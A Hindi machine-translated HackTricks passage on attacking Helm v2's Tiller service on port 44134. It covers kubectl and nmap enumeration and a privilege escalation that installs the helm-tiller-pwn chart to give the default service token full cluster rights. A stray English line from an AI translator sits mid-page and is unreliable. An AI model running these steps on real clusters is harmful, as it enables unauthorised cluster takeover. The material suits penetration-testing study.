mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 05:03:35 +00:00
83 lines
8.4 KiB
Markdown
83 lines
8.4 KiB
Markdown
<details>
|
|
|
|
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
|
|
|
HackTricks का समर्थन करने के अन्य तरीके:
|
|
|
|
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
|
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
|
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**.
|
|
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
|
|
|
|
</details>
|
|
|
|
|
|
# मूल जानकारी
|
|
|
|
Helm Kubernetes के लिए **पैकेज मैनेजर** है। यह YAML फाइलों को पैकेज करने और उन्हें सार्वजनिक और निजी रिपोजिटरीज में वितरित करने की अनुमति देता है। इन पैकेजों को **Helm Charts** कहा जाता है। **Tiller** एक **सेवा** है जो डिफ़ॉल्ट रूप से पोर्ट 44134 पर **चल रही** होती है जो सेवा प्रदान करती है।
|
|
|
|
**डिफ़ॉल्ट पोर्ट:** 44134
|
|
```
|
|
PORT STATE SERVICE VERSION
|
|
44134/tcp open unknown
|
|
```
|
|
# सूचीकरण
|
|
|
|
यदि आप **पॉड्स और/या सेवाओं का सूचीकरण** विभिन्न नामस्थानों में कर सकते हैं, तो उन्हें सूचीबद्ध करें और **"tiller" नाम वाले** लोगों की खोज करें:
|
|
```bash
|
|
kubectl get pods | grep -i "tiller"
|
|
kubectl get services | grep -i "tiller"
|
|
kubectl get pods -n kube-system | grep -i "tiller"
|
|
kubectl get services -n kube-system | grep -i "tiller"
|
|
kubectl get pods -n <namespace> | grep -i "tiller"
|
|
kubectl get services -n <namespace> | grep -i "tiller"
|
|
```
|
|
Since you haven't provided any specific text to translate, I can't proceed with a translation. Please provide the English text you want to be translated into Hindi, and I'll be happy to assist you.
|
|
```bash
|
|
kubectl get pods -n kube-system
|
|
NAME READY STATUS RESTARTS AGE
|
|
kube-scheduler-controlplane 1/1 Running 0 35m
|
|
tiller-deploy-56b574c76d-l265z 1/1 Running 0 35m
|
|
|
|
kubectl get services -n kube-system
|
|
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
|
|
kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP,9153/TCP 35m
|
|
tiller-deploy ClusterIP 10.98.57.159 <none> 44134/TCP 35m
|
|
```
|
|
आप यह भी प्रयास कर सकते हैं कि पोर्ट 44134 की जांच करके यह सेवा चल रही है या नहीं:
|
|
```bash
|
|
sudo nmap -sS -p 44134 <IP>
|
|
```
|
|
एक बार जब आप इसे खोज लेते हैं, तो आप इससे संवाद कर सकते हैं क्लाइंट helm एप्लिकेशन डाउनलोड करके। आप `homebrew` जैसे टूल्स का उपयोग कर सकते हैं, या [**आधिकारिक रिलीज़ पेज**](https://github.com/helm/helm/releases)** पर देख सकते हैं।** अधिक जानकारी के लिए, या अन्य विकल्पों के लिए, [स्थापना गाइड](https://v2.helm.sh/docs/using_helm/#installing-helm) देखें।
|
|
|
|
फिर, आप **सेवा की गणना कर सकते हैं**:
|
|
```
|
|
helm --host tiller-deploy.kube-system:44134 version
|
|
```
|
|
## विशेषाधिकार वृद्धि
|
|
|
|
डिफ़ॉल्ट रूप से **Helm2** को **namespace kube-system** में **उच्च विशेषाधिकारों** के साथ स्थापित किया गया था, इसलिए यदि आपको सेवा मिलती है और इस तक पहुँच है, तो यह आपको **विशेषाधिकार वृद्धि** करने की अनुमति दे सकती है।
|
|
|
|
आपको बस इतना करना है कि इस तरह का एक पैकेज स्थापित करें: [**https://github.com/Ruil1n/helm-tiller-pwn**](https://github.com/Ruil1n/helm-tiller-pwn) जो **डिफ़ॉल्ट सर्विस टोकन को पूरे क्लस्टर में सब कुछ तक पहुँच प्रदान करेगा।**
|
|
```
|
|
git clone https://github.com/Ruil1n/helm-tiller-pwn
|
|
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
|
|
/pwnchart
|
|
```
|
|
[http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) में आपके पास **हमले की व्याख्या** है, लेकिन मूल रूप से, यदि आप _helm-tiller-pwn/pwnchart/templates/_ के अंदर [**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) और [**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml) फाइलों को पढ़ते हैं, तो आप देख सकते हैं कि कैसे **सभी विशेषाधिकार डिफ़ॉल्ट टोकन को दिए जा रहे हैं**।
|
|
|
|
|
|
<details>
|
|
|
|
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ AWS हैकिंग सीखें शून्य से नायक तक</strong></summary>
|
|
|
|
HackTricks का समर्थन करने के अन्य तरीके:
|
|
|
|
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
|
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
|
|
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
|
|
|
|
</details>
|